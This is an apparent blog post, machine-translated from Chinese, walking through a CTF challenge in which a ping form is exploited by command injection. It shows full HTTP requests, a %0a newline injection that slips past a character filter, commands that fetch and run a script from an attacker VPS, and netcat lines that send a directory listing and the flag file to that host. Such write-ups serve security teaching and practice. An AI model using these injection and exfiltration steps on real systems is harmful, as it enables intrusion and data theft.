banner
lca

lca

真正的不自由,是在自己的心中设下牢笼。
HomeArchives图文

Command Execution Bypass - Death Ping Command

#ctf#wp27
AI Translation
This post is translated from Chinese into English through AI.View Original
AI-generated summary
A friend shared a CTF challenge involving a command execution vulnerability on a website. Initial testing showed no response but confirmed command execution success. The vulnerability was tested for character filtering, revealing that characters like `;`, `` ` ``, and `$` were blocked. However, the newline character `%0a` was not filtered, allowing for command execution via DNS log. To exploit this, a VPS was set up with a script (`1.sh`) that lists directory contents and sends them back to the attacker's machine. The attacker used `nc` to listen for requests and a Python HTTP server to serve the script. The target machine executed commands to download and run the script, ultimately allowing the attacker to retrieve the flag by modifying the script to output the contents of `/FLAG`. The process involved crafting specific requests to bypass filters and execute commands on the target machine, leading to successful flag retrieval.

297a673a89db936acaa55bac560f989

A friend sent me a CTF challenge. Opening the website shows a command execution vulnerability at first glance.

Pasted image 20241115170827

Packet capture testing shows no echo, but it indicates that the command execution was successful.

Pasted image 20241115170856

The request is as follows:

POST /ping.php HTTP/1.1
Host: ctf.zhibangyang.cn:20508
Content-Length: 12
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36
Accept: */*
DNT: 1
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://ctf.zhibangyang.cn:20508
Referer: http://ctf.zhibangyang.cn:20508/
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close

ip=127.0.0.1

Testing which characters are filtered, it was found that the following characters were filtered, thus blocking the DNS log bypass method.

;`$

Pasted image 20241115170926

Pasted image 20241115170956

The DNS log bypass method usually utilizes angle brackets for command execution, such as

`whoami`.xxx.dnslog.cn

Testing revealed that the % character was not filtered and could bypass command execution using %0a (newline character).

  1. Prepare a VPS server and create a script named 1.sh on the VPS with the following content:
ls / | nc vps_address 1234
  1. On the VPS, use nc to listen for requests and open a new window to start a Python server to allow the target machine to download the 1.sh script:
nc -lvnp 1234

python3 -m http.server 80
  1. The target machine executes the following command:
ip=127.0.0.1%0acurl vps_address/1.sh > /tmp/4.sh
chmod 777 /tmp/4.sh
/bin/sh /tmp/4.sh

The request shows as follows:

POST /ping.php HTTP/1.1
Host: ctf.zhibangyang.cn:20508
Content-Length: 50
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36
Accept: */*
DNT: 1
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://ctf.zhibangyang.cn:20508
Referer: http://ctf.zhibangyang.cn:20508/
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close

ip=127.0.0.1%0acurl vps_address/1.sh > /tmp/4.sh

Pasted image 20241115172903

The result is as follows, which can return the request.

c7a4bf2d2d68349b0d31078e064e410

To view the flag, simply modify the content of the 1.sh script as follows:

cat /FLAG | nc vps_address 1234

Run through it again to obtain the flag:

ip=127.0.0.1%0acurl vps_address/1.sh > /tmp/5.sh
chmod 777 /tmp/5.sh
/bin/sh /tmp/5.sh

490d14b6eac008d7954445c85e0e895

Based on the format of the flag, it is known that the question is from n1book.

Loading...
Ownership of this post data is guaranteed by blockchain and smart contracts to the creator alone.